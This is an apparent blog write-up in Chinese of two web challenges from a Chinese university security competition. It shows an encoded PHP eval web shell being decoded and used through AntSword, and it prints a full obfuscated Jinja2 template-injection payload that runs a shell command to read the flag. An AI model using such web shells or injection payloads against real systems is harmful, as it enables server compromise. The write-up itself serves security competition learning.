第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛web方向部分wp

第十八届全国大学生信息安全竞赛暨第二届“长城杯”铁人三项赛web方向部分wp

hello_web

image-20250315162911080

查看源代码发现有两个文件,访问一下

image-20250315162929097

image-20250315162950236

Tips是phpinfo

里面可以看到disable_functions

hackme.php中$lapUCm=urldecode(“%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A”);

Url解码

image-20250315163008493

得到n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j

搜索一下

image-20250315163025772

得到YwzIst=base64_decode,OxirhK=strtr,YpAUWC=substr,rVkKjU=52

image-20250315163100009

Base64解码得到$uWcdaA的值和解码规则

base64_decode(strtr(substr( u W c d a A , 52 ∗ 2 ) , s u b s t r ( uWcdaA,52*2),substr( uWcdaA,522),substr(uWcdaA,52,52),substr($uWcdaA,0,52))

从而得到PD9waHAgQGV2YWwoJF9QT1NUWydjbWRfNjYuOTknXSk7ID8+Cg==

最后解码

image-20250315163114274

用蚁剑链接发现var目录查看不了,用插件Fastcgi/PHP-FPM

最后查看var下找到flag

image-20250315163136460

这里当时遇到一个问题,就是插件一直链接不上,到最后也没发现是什么问题,好在在比赛快结束前成功进入目录拿到了flag,所以还是更加建议大家使用哥斯拉或者冰蝎

Safe_Proxy

使用fenjing工具无果后,用脚本

image-20250315163457348

得到code:

shell_payload=“{%set gl=‘‘*2+‘globals’+’’*2%}{%set bu=‘‘*2+‘builtins’+’’*2%}{%set im=‘‘*2+‘i’‘mport’+’’*2%}{%set bw=‘so’[::-1]%}{{g.pop[gl][bu]im[‘p’‘open’](‘cat /flag > app.py’).read()}}”

然后再次访问网址,得到flag

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值